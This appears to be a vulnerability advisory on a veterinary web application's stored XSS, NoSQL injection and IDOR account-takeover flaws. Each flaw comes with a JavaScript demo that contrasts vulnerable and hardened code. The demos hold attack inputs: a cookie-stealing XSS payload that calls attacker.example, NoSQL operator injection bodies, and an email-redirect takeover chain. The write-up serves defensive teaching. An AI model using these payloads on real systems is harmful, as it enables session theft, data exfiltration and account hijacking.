Wakyma Application Web
A stored Cross-Site Scripting (XSS) vulnerability exists in the Wakyma veterinary web application at 'vets.wakyma.com/configuracion/agenda/modelo-formulario-evento' (the event form template settings). An authenticated user with low privileges can save a template containing script; the payload persists server-side and executes in the browser of every other user who opens it, so the attacker can act in those users' sessions, read data they are entitled to, and effectively escalate privileges across the veterinary team. The CVSS v4.0 base score is 4.8 (low to medium), but the organizational risk is higher than the number suggests: the payload is stored, and a low-privileged user can target higher-privileged colleagues. No public exploit code or in-the-wild exploitation has been reported. The attack needs only network access and a victim opening the affected page, which puts it well within reach of an insider.
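The pattern behind the stored XSS above, as an added example that is not Wakyma's code: a form template is saved from a low-privileged user's POST and later rendered for every team member who opens the agenda. The store, the field names, the attacker hostname and both payloads are constructed for the demonstration; the render functions show the unescaped concatenation that makes the bug possible beside the context-aware encoding and write-time allowlist that close it.

```javascript
// Added example, not Wakyma's code. Models an event-form template saved from
// POST /configuracion/agenda/modelo-formulario-evento and later rendered for
// every team member who opens the agenda. Store, field names and the payload
// are all constructed for the demonstration.

const templateStore = new Map();                 // stand-in for the database

function saveTemplate(id, template) {            // what the endpoint persists
  templateStore.set(id, template);
  return template;
}

// Vulnerable rendering: the stored label is concatenated into HTML unescaped,
// so whatever the low-privileged author typed runs in every viewer's browser.
function renderTemplateVulnerable(template) {
  return template.fields
    .map(f => `<label>${f.label}</label><input name="${f.name}">`)
    .join('\n');
}

// Contextual output encoding for HTML text and double-quoted attribute values.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Hardened rendering: every untrusted value is encoded for the context it
// lands in, so the stored payload is displayed as text instead of executed.
function renderTemplateHardened(template) {
  return template.fields
    .map(f => `<label>${escapeHtml(f.label)}</label><input name="${escapeHtml(f.name)}">`)
    .join('\n');
}

// Defence in depth at write time: a field label in a veterinary agenda has no
// business containing markup, so reject anything outside a tight allowlist.
const LABEL_RE = /^[\p{L}\p{N} .,:;()\/¿?¡!-]{1,80}$/u;
const NAME_RE = /^[a-z0-9_]{1,40}$/;
function validateTemplate(template) {
  return Array.isArray(template.fields) &&
    template.fields.every(f => LABEL_RE.test(f.label) && NAME_RE.test(f.name));
}

// Constructed attacker input: a broken image whose error handler exfiltrates
// the viewer's session cookie to an attacker-chosen host (hostname is hypothetical).
const attackerPayload = {
  fields: [{
    name: 'motivo',
    label: '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
  }],
};
const honestPayload = {
  fields: [{ name: 'motivo', label: 'Motivo de la visita' }],
};
```

Output encoding is the fix; the allowlist is a second layer that also gives you a cheap detection point, since a rejected label containing angle brackets is worth logging with the submitting user's identity.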
A NoSQL injection (NoSQLi) vulnerability exists in the 'vets.wakyma.com/pets/print-tags' endpoint of the Wakyma web application. An authenticated user can inject NoSQL query operators through a manipulated POST body and use the endpoint to extract data it was never meant to return, including pet names and owner names, from the backend database. With a CVSS score of 5.3 and low attack complexity this is a moderate confidentiality risk that warrants prompt remediation, even though valid credentials are required.
A second NoSQL injection (NoSQLi) vulnerability exists in the Wakyma veterinary web application, in the hospitalization summary generation endpoint on vets.wakyma.com. An authenticated user with low privileges can inject NoSQL operators into the POST request and exfiltrate customer reports containing sensitive veterinary and pet owner data. The CVSS score is a high 7.1; the requirement for authentication limits the attack surface to users who hold valid credentials, which in a clinic still includes every staff account.
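Both NoSQLi findings above (print-tags and the hospitalization summary) come down to the same mistake: a value parsed from a JSON POST body is placed directly into a query document, so a client that sends an object instead of a string controls the query operators. The following is an added example, not Wakyma's code, modelling a print-tags style lookup. The pets collection, the session object and the request bodies are constructed, and the filter evaluator is a stand-in that implements only the slice of MongoDB filter semantics needed here (equality, `$ne`, `$regex`, with JavaScript rather than PCRE regex), enough to run the comparison offline.

```javascript
// Added example, not Wakyma's code. Models a POST /pets/print-tags handler
// that looks pets up by name. The pets array, the session object and the
// filter evaluator are constructed stand-ins; the evaluator implements only
// the slice of MongoDB filter semantics needed here (equality, $ne, $regex).

const pets = [
  { _id: 1, clinic: 'clinic-a', name: 'Luna', owner: 'Ana' },
  { _id: 2, clinic: 'clinic-a', name: 'Max', owner: 'Berta' },
  { _id: 3, clinic: 'clinic-b', name: 'Rex', owner: 'Carlos' },
];

function fieldMatches(value, cond) {
  if (cond !== null && typeof cond === 'object' && !Array.isArray(cond)) {
    // An object in value position is an operator document, which is exactly
    // what a JSON body parser hands the application when the client sends one.
    return Object.entries(cond).every(([op, arg]) => {
      if (op === '$ne') return value !== arg;
      if (op === '$regex') return new RegExp(arg).test(String(value));
      throw new Error(`operator ${op} not modelled`);
    });
  }
  return value === cond;
}

function find(collection, filter) {
  return collection.filter(doc =>
    Object.entries(filter).every(([k, cond]) => fieldMatches(doc[k], cond)));
}

// Vulnerable: the parsed body value goes straight into the query document.
function printTagsVulnerable(body, session) {
  return find(pets, { clinic: session.clinic, name: body.pet_name });
}

// Hardened: the field must be a bounded scalar string, so no operator
// document can reach the driver. Reject, do not coerce.
function printTagsHardened(body, session) {
  const name = body.pet_name;
  if (typeof name !== 'string' || name.length === 0 || name.length > 100) {
    throw new TypeError('pet_name must be a non-empty string');
  }
  return find(pets, { clinic: session.clinic, name });
}

// Constructed requests: a legitimate lookup, an operator injection that
// matches every pet in the clinic, and a regex probe that recovers names
// one character at a time by observing which requests return results.
const session = { clinic: 'clinic-a' };
const honestBody = { pet_name: 'Luna' };
const dumpAllBody = { pet_name: { $ne: null } };
const probeBody = { pet_name: { $regex: '^L' } };
```

The general form of the fix is schema validation of the whole body (every field typed, no unknown keys) before anything touches the query builder; the type check shown is the minimum for one field. Stripping `$`-prefixed keys from the body is a weaker fallback, since it sanitizes rather than validates.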
An Insecure Direct Object Reference (IDOR) authorization bypass allows an authenticated attacker to modify other users' account data, including the email address, and then hijack those accounts through the password reset flow, since the reset link is delivered to the attacker-controlled address. The source record does not specify the affected product. The vulnerability carries a CVSS score of 8.6, requires only low privileges and network access to exploit, and results in complete account takeover. It is not in CISA's KEV catalog, no public proof-of-concept exists, and no EPSS score is available.
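The chain described above, as an added example that is not code from the affected product: a profile update endpoint that trusts the user id in the URL, followed by a password reset that goes to whatever address is now on the account. The users, sessions, mail outbox and email addresses are constructed; the hardened version shows the two controls that break the chain, an ownership check on the object reference and staging of email changes until the new address confirms it.

```javascript
// Added example, not code from the affected product. Models a profile update
// endpoint (PUT /users/:id) and the password-reset request that follows it.
// Users, sessions, the mail outbox and the email addresses are constructed.

const users = new Map([
  [101, { id: 101, email: 'vet@clinic.example', role: 'admin' }],
  [202, { id: 202, email: 'assistant@clinic.example', role: 'assistant' }],
]);
const outbox = [];   // where reset mail would go; recorded here instead of sent

// Vulnerable: the target comes from the URL and is never compared with the
// caller. Any authenticated user can rewrite any other user's email.
function updateUserVulnerable(session, targetId, patch) {
  const user = users.get(targetId);
  if (!user) throw new Error('not found');
  Object.assign(user, patch);
  return user;
}

// Hardened: the object reference must belong to the caller (or the caller
// must hold an explicit admin role), and an email change is staged until the
// new address proves it can receive mail, so a reset link cannot be diverted.
function updateUserHardened(session, targetId, patch) {
  const user = users.get(targetId);
  if (!user) throw new Error('not found');
  const isSelf = session.userId === targetId;
  const isAdmin = users.get(session.userId)?.role === 'admin';
  if (!isSelf && !isAdmin) {
    const err = new Error('forbidden');
    err.status = 403;
    throw err;
  }
  const { email, ...rest } = patch;
  Object.assign(user, rest);
  if (email !== undefined && email !== user.email) {
    user.pendingEmail = email;           // confirmed by a link sent to `email`
    outbox.push({ to: email, kind: 'confirm-email-change', userId: user.id });
  }
  return user;
}

// Password reset: the link goes to whatever address is on the account, which
// is exactly why control over the email field equals control of the account.
function requestPasswordReset(email) {
  const user = [...users.values()].find(u => u.email === email);
  if (!user) return null;                // respond identically either way in practice
  const mail = { to: user.email, kind: 'password-reset', userId: user.id };
  outbox.push(mail);
  return mail;
}

// Constructed attack chain: the low-privileged assistant (202) points the
// admin's (101) account at an attacker mailbox and then asks for a reset.
function takeoverViaVulnerableEndpoint() {
  const attacker = { userId: 202 };
  updateUserVulnerable(attacker, 101, { email: 'attacker@evil.example' });
  return requestPasswordReset('attacker@evil.example');
}
```

For detection, the useful signal is an email change on one account issued from a session belonging to another, followed shortly by a reset request for the new address; both events are visible in ordinary application logs if the handler records the acting user as well as the target.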